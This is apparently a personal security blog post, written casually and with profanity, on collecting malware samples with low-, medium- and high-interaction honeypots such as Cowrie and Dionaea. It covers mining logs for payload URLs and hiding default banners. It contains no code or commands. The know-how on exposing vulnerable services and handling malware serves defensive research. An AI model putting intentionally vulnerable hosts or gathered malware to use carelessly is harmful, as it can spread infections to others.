In the days of the caveman, pre-historic humans had to live off the land in order to survive. In the summer, there was plenty of foraging that could be done for easy food that grew on trees and bushes. Collecting sustenance was a matter of life and death, and as now just as it was then, we must collect for our own survival. Except in this day and age, we collect malware instead of sweet, sweet berries. In this Basics post, I’ll be talking into the void about one popular method to get malware samples.
In the last post, I talked about some of the tools I like to use when I already have binaries in hand, but as is tradition around here, I realized that I fucked up and should have written a post about how to get the binaries in the first place. Oopsie Doopsie! So here’s that post…
Now, there are a lot of ways we can get our hands on some malware we can look at. There are all kinds of different places that you can get malware samples for free including a malware zoo, but to me the most fun part of collecting malware is finding binaries with newly seen hash values. You don’t have to be spoiled about the samples you work with like I am, but this is just a personal preference.
At some point, I may do a post on working with a malware zoo, but for right now I’m going to look at two methods I use consistently to get new samples:
I started with honeypots as a collection method because of how much opportunity comes to a well configured honeypot. They’re easy to operate and can pay off in a big way if you work with them enough, but there are a few different things that you should take note of before you jump straight into them.
One thing to keep in mind when it comes to honeypots is that there are different types of honeypots that are good for some situations, and other types that are good for another kind of situation. Knowing which to use and where is a skill that comes with experience, experience that I frankly don’t have yet, so just take my word for it I guess.
When it comes to terminology, “Low interaction”, “Medium interaction” and “High interaction” are generally used to describe how much exposure a service is to attack. This concept can be a little bit foreign to us security types because we tend to subscribe as a whole to the belief that any amount of exposure is just plain bad, and we don’t want anything that looks, or that actually is vulnerable to be exposed to someone with the motivation to exploit it. It’s not a bad attitude to have, but it’s not terribly productive if we’re going against every better instinct we have and decide to dabble with honeypots.
0.25 Low-Interaction Honeypots
Low interaction honeypots are good for log collection and researching recon TTPs without offering attackers too much to work with. If your interest is in simulating services just to see how attackers might be interacting with them, a low interaction honeypot might be what you’re looking for. “Low interaction” because an attacker isn’t going to be able to do much with the service except interrogate it.
Say that you want to research who on the internet might have interested in a specific version of FTP but you don’t want to end up exposing your whole system by installing a working version of that service onto your honeypot (remember, you’re accountable for whatever happens on this box. Maybe that doesn’t even matter to you, in which case, knock yourself out, dummy! Run the service and see what happens.) You can run a low-interaction honeypot that will look like that vulnerable version of FTP without giving the attacker a shell or any meaningful way to interact with it.
Another use case for low-interaction honeypots are inside of a network as “canary” boxes, or hosts that will give you early warning if someone starts taking a little too much interest in them.
Can you still get binaries off of them? In a sense, yes…but not necessarily because the binary was dropped on the system directly. It’s not widely understood how one can find binary material on a honeypot, and the high, medium, low “interaction” language has confused people in the past (read; it confused me) so don’t let it confuse you too.
How exactly can a low-interaction honeypot be used to collect binaries? It’s all in the logs. If you’ve ever participated in a CTF before, you’ve almost certainly had to use an exploit that forces a target to download a file from a specified service. The standard low-effort model for doing this is to force the victim to download from an open web share where your shellcode (the payload you want to run on the victim’s machine) is hosted. Well guess what buddy, that shit logs. Boy howdy, does it log, and when it does, you’ll be there to see exactly what the attacker was trying to get you to download. Sure would be a shame if someone just went ahead and,..ya know….downloaded it. Anyway, that’s a methodology for another blogpost.
0.5 Medium-Interaction Honeypots
As far as honeypot terminology is concerned, “Medium-interaction” isn’t used as often as “low” and “high” are which if your mind works the same as mine does, you’re probably thinking, “Hexa, it sounds like a bullshit term” and yeah, you’d kind of be right.
Is there an easily discernible, clean difference in terminology between low/medium and medium/high? No. No, not really. It’s just an expression of the idea that a medium-interaction service is slightly more open and interactable (not a word) than low-interaction honeypots are, and slightly less than a high-interaction honeypot is. So if you have a honeypot that for all intents and purposes is low-interaction but maybe exposes a service slightly more, but not enough to justify calling it “high-interaction” you might call it a medium-interaction honeypot. It doesn’t really matter, it’s all meaningless bullshit anyway just like life.
0.75 High-Interaction Honeypots
High-interaction honeypots are more interesting for many people, and are probably the ones that you all have more interest in, so I’ll try to spend more time on them throughout this series. If your intention is not so much about how to tell when someone takes interest in your machine, but after they’ve already decided that your tasty-looking machine is worth the effort, then you might consider running a high-interaction honeypot.
With a high-interaction honeypot, you can run a service that will not only appear vulnerable, not only is vulnerable, but will also look and feel like a gummy bear stored in a pocket all day. Soft, warm, and even a little bit gooey when you bite into it. One of the most well-known high interaction honeypots out there right now is Kippo, which is an older version of a more modern honeypot called Cowrie.
These are SSH honeypots that invite attackers to log in with whatever credentials they have (so convincing that you might be as absent minded as I am and log into the wrong service on occasion and end up getting stuck in your own honeypotted service. Stupid.) Once on the inside, attackers are served a limited shell, limited in the sense that it’s more or less a cloned interactive shell with fewer commands available and more limited permissions.
High-interaction honeypots aren’t necessarily more prone to having iffy binaries left on disk because some low/medium-interaction honeypots may try to automatically pull files an attacker will try to serve to the honeypot and store it on disk. So depending on the retrieval method your selected honeypot uses for offered malware, you may or may not want to check your local malware traps to make sure you’re getting as much goodness out of them as possible.
High interaction honeypots offer you a look at more host-based TTPs. What scripts are being used after an attacker logs in? What order are the scripts being used in? Are they leaving any clues behind in post-exploitation logging that might give away who they are or what they want? Probably. Like that slop of a boyfriend you’ve probably had (everyone has) who comes over to your house and leaves “wet Kleenex” all over your computer desk, there will be DNA evidence to any given attack that will give you post-exploitation clues, it’s just a matter of putting your analysis hat on and piecing the clues together.
1.0 Losing Control of your honeypots
Oh, your honeypot got hacked? You intentionally made a vulnerable box and someone hacked it. Who ever could have seen that coming?! If you read my blog and decided to wade into these foolhardy waters against my advice, it’s your own darn fault and you’ve probably done something to someone at some point in your life that caused this to happen to you.
Losing control of your honeypot is a fact of life. You’re swimming with sharks, and sometimes the sharks get annoyed when they catch wise about what you’re doing. If you’re new to this, you’re going to lose control of one of your honeypots. It’s a fact of life, but it’s not the end of the world. Things get hacked all the time, and when you’re doing something as ridiculous as script kiddies to scan and compromise your system, don’t be surprised if they land a blow on your intentionally vulnerable box.
2.0 A Final, General Note On Good Honeypot Configurations
Standing up a honeypot is one thing, but making it actually effective is another. If your goal is to find something that hasn’t been seen before or to add value outside of just grabbing the same old crap that has been floating around on the Internet for decades, you’re going to have to figure out how to make your honeypot look like a good target.
It turns out that established platforms like Dionaea are often able to be fingerprinted by programs like nmap if you leave them in their default configurations, so it really does pay to at least change up the overt banner configurations you have if you’re using a popular honeypot platform.